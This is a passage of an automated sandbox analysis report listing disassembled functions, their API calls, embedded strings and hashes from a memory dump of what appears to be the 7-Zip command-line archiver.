Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ByteStringmemmove
String ID:
API String ID: 400576877-0
Opcode ID: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
Instruction ID: eb39beb09a0cc1b607c84e1dadd4d968f27fec9707e8ff72ba41ec0d6b648b31
Opcode Fuzzy Hash: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
Instruction Fuzzy Hash: D421B523314B9092EF259F5DE9503697368FB887A0F484529AFAE0B7A4DF3CC856C310

Function 00999644 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 009996D5
free.MSVCRT ref: 009996F1
free.MSVCRT ref: 00999706

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$wcscmp
String ID:
API String ID: 4021281200-0
Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
Instruction ID: 491974aab33c94666b2a7f3caf68cd1b5d4127df1a7c91803235b1f6adb0c27b
Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
Instruction Fuzzy Hash: 5921B07721474096DF20AF2EE8403697761E7C9BE4F549225AE6A47794EF38C586CB00

Function 0097FADC Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097FB44

Strings

Unsupported charset:, xrefs: 0097FB91

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID: Unsupported charset:
API String ID: 1294909896-616772432
Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
Instruction ID: c7b06a0fc599a2a855d9d663e41c3149b374e181ad093e9346921396ffca99b1
Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
Instruction Fuzzy Hash: 4E21746360460092DB20DB18E8A079D7721F7D47E8F948222EAAD577B5DF68C986C750

Function 00976D48 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00977D4C: GetFileAttributesW.KERNELBASE ref: 00977D6E
Part of subcall function 00977D4C: GetFileAttributesW.KERNEL32 ref: 00977DA5
Part of subcall function 00977D4C: free.MSVCRT ref: 00977DB2

DeleteFileW.KERNEL32 ref: 00976D90
DeleteFileW.KERNEL32 ref: 00976DCA
free.MSVCRT ref: 00976DDA
free.MSVCRT ref: 00976DE8

Part of subcall function 009768A0: SetFileAttributesW.KERNELBASE ref: 009768C7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: File$Attributesfree$Delete
String ID:
API String ID: 324319583-0
Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
Instruction ID: 3f72188c173b654c1b06bd80af66faf8b0b8ccc86ce52632880589061ba75515
Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
Instruction Fuzzy Hash: 85014433358F0141CE30AF25EC613AD13259BCABB4F9C9721ADBE873E5DE28C9569600

Function 0098211C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00982137
free.MSVCRT ref: 009821BB

Part of subcall function 00976618: FormatMessageW.KERNEL32 ref: 00976676
Part of subcall function 00976618: LocalFree.KERNEL32 ref: 00976698

Part of subcall function 0097362C: memmove.MSVCRT ref: 00973659

free.MSVCRT ref: 00982182

Strings

: , xrefs: 00982151, 00982187

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ErrorFormatFreeLastLocalMessagememmove
String ID: :
API String ID: 1743135865-3653984579
Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
Instruction ID: c97ade0243d6cd091b8c5d7c2dcaf88eb735d37e64f04339dc287fda7aac48ed
Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
Instruction Fuzzy Hash: F501656330490091CA20EB25EC4135E6721EBC9BF4F94D321BE9E477B9EE28CA86C750

Function 0097C878 Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 0097C898
ReadFile.KERNEL32 ref: 0097C8B3
GetLastError.KERNEL32 ref: 0097C8CD
GetLastError.KERNEL32 ref: 0097C8DC

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
Instruction ID: 30b3364135717c16f7a9e260cf25fd36d019525bee538830725bacc70c6ae93a
Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
Instruction Fuzzy Hash: FA012663724061CBD7215B3DAD043697298B708BF2F908539FE4ECBB50EB28CC828781

Function 009BACDC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

Strings

System ERROR:, xrefs: 009BAD34
ERROR: Can't allocate required memory!, xrefs: 009BACF6
Break signaled, xrefs: 009BAD14

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs
String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
API String ID: 1795875747-932691680
Opcode ID: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
Instruction ID: 70debf4fc0d59f4c0d93b73f12bea00009344bbd3df14ef495e987a4d6d3c975
Opcode Fuzzy Hash: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
Instruction Fuzzy Hash: 2101D422255904EADB18EF21ED903E87320E7C1BA1FC09422EA0D872B6DF3CCC85C742

Function 0097695C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32 ref: 0097697E
RemoveDirectoryW.KERNEL32 ref: 009769B8
free.MSVCRT ref: 009769C8
free.MSVCRT ref: 009769D6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: DirectoryRemovefree
String ID:
API String ID: 736856642-0
Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
Instruction ID: 34fdf6b0414185cfa7e8e41381eb29be9f6a98606a232c49abbe260c8754d905
Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
Instruction Fuzzy Hash: 51F03627208B0181D9309B21A95133D6324A7C57F4F4482219EBD476A5DF29C946D710

Function 00972EF4 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00972F5B

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,0097302B,?,?,?,?,00973698), ref: 00972F2C
free.MSVCRT ref: 00972F34

Strings

Unsupported switch postfix -stm, xrefs: 00972EF6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrow$freemallocmemmove
String ID: Unsupported switch postfix -stm
API String ID: 3321538808-3553869907
Opcode ID: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
Instruction ID: 4a2356379f967cb802d958125472d718544bf7544ec0d157b9dd0ea21166a92b
Opcode Fuzzy Hash: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
Instruction Fuzzy Hash: 95F0F07770128586DB289F4AE4803ADA362E7C47E0F24C020DB8E07B12DE39D886CB00

Function 00972A9C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00972AFD

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

memmove.MSVCRT ref: 00972ACE
free.MSVCRT ref: 00972AD6

Strings

(LP-, xrefs: 00972A9E

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrow$freemallocmemmove
String ID: (LP-
API String ID: 3321538808-3833670221
Opcode ID: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
Instruction ID: 7ebd3255b94639d5d553774739aeb3b46305c7ca354302156638caedd80fea2a
Opcode Fuzzy Hash: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
Instruction Fuzzy Hash: B7F0907761124586DA289F4AE88169DB321E7C47E4F64C025DF8D07755DA39D886CB00

Function 009BBF24 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BBF61
fputs.MSVCRT ref: 009BBF71
fputs.MSVCRT ref: 009BBF7D

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

free.MSVCRT ref: 009BBF91

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$fputcfree
String ID:
API String ID: 3819637083-0
Opcode ID: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
Instruction ID: 4b5f7a917851c12016949d68b099672f92db2d0870cf1efb4f5102d3020781d6
Opcode Fuzzy Hash: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
Instruction Fuzzy Hash: CEF0FFA661494081DA30EF2AFD5435A6321BBD9BF4F489321EEAE077A5DF28C546C710

Function 009B3E08 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009B3E51

Part of subcall function 009B2B60: CompareFileTime.KERNEL32(?,?,?,00000000,009B3E64), ref: 009B2BA5

Strings

alternate streams, xrefs: 009B3E2D
streams, xrefs: 009B3E64
files, xrefs: 009B3E14

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CompareFileTimememmove
String ID: alternate streams$files$streams
API String ID: 1303509325-806849385
Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
Instruction ID: dc1269654f8ad875131eb5a94b04ca76ecf78c8e15ebb8197901f4c57ca73f85
Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
Instruction Fuzzy Hash: 82F0F6527105A9A2FB60EB66D615BDC6320FB85BD4FC09022BE8C07E65DF38C39AC700

Function 00976618 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32 ref: 00976676

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

LocalFree.KERNEL32 ref: 00976698

Strings

Error #, xrefs: 00976714

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: FormatFreeLocalMessagefreememmove
String ID: Error #
API String ID: 2451246624-1299485822
Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
Instruction ID: ebd5ccff19510c16f1232b3eee6d16ea1b477b9bbb43987ab51f64f056dd564a
Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
Instruction Fuzzy Hash: 8821EF33214A8096CB24CF16E44179D77A5F7C5BA8F84C226DA8D47B95DF78C588CB10

Function 009749A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

UNC, xrefs: 00974A59

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID: UNC
API String ID: 0-337201128
Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
Instruction ID: 57d37e5b040bbc453fb605d2a65e760b3c5fe216d36358adf6224b8adf6197f3
Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
Instruction Fuzzy Hash: 99215C37340A45C6DB29CB66E890B687368E785B98F14D027DF4D47762EB39CC85C705

Function 009B05F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B0661
free.MSVCRT ref: 009B0680

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

ERROR: , xrefs: 009B065A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: ERROR:
API String ID: 2276422817-977468659
Opcode ID: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
Instruction ID: 16cd2a7d209eda0c340ca7a0414de81c50031dfcbb99df82d7efc26ca58381c4
Opcode Fuzzy Hash: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
Instruction Fuzzy Hash: 22118F63311A0482DA34EB26ED5576E6320FBC5BE0F488626EE6F4B7A2DF2CC445C340

Function 0097B45C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4AA
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4F8

Strings

Path64, xrefs: 0097B45C

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: QueryValue
String ID: Path64
API String ID: 3660427363-321863482
Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
Instruction ID: a7f4544dfc63c53958dd088108483b9c6c40b2c9e22b5358d3be0ee53b566e20
Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
Instruction Fuzzy Hash: 70214C73615640C7EB14CF25E45476E77A4F794B84F60912AEB8907BA8DB3CC885CF40

Function 009B427C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B42DF

Strings

Can not open the file as archive, xrefs: 009B42D8
Can not open encrypted archive. Wrong password?, xrefs: 009B4297

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs
String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
API String ID: 1795875747-2399861261
Opcode ID: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
Instruction ID: cc56c898ae422b28d3e379156e10c4c2e02272f59bd89be28e4d122035cce43d
Opcode Fuzzy Hash: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
Instruction Fuzzy Hash: 80018F6232064592EF14EB2AE95079D2321EB85FE0F94D032EE0E47346CE2CC894D300

Function 009793D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 0097941A
wcscmp.MSVCRT ref: 00979430

Strings

\??\, xrefs: 009793E6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: wcscmp
String ID: \??\
API String ID: 3392835482-3047946824
Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
Instruction ID: ca7c2f9dc4ad36493f815c12690dec79369d469a517f896fb03148bc6d4d0cf7
Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
Instruction Fuzzy Hash: 3AF0307370595497CE149B2AEAA036C2321FB85B95F909832CB4E97A25DF24D4FBC314

Function 009B1FE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B2011

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

Strings

Scan, xrefs: 009B2036
Scanning, xrefs: 009B200A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputcfputs
String ID: Scan$Scanning
API String ID: 269475090-1436252306
Opcode ID: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
Instruction ID: 7e6d982fde07dc3cc5642dfd98db18419825357ca3cff58a00d9b639b0ac56ee
Opcode Fuzzy Hash: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
Instruction Fuzzy Hash: 77F0B46275154191EB11EF38CA597EC2365E750B98F488121DB0E4B165DF28C8C6C310

Function 0097AFA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32 ref: 0097AFC7
_CxxThrowException.MSVCRT ref: 0097AFEE

Strings

out of memory, xrefs: 0097AFD6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID: out of memory
API String ID: 3773818493-2599737071
Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
Instruction ID: 7a3c00d7c3b953e8c13cabd8fac930ffe5792e84b3e7e8294fcca9673983a167
Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
Instruction Fuzzy Hash: 75F01562301B8592DB04AB15EA9574CB3B4EBC9B94F64C425CB4C07B29EBB9C8A9C701

Function 009BB7C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BB7E4

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

Strings

Scanning the drive:, xrefs: 009BB7DD
Scan , xrefs: 009BB7F6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
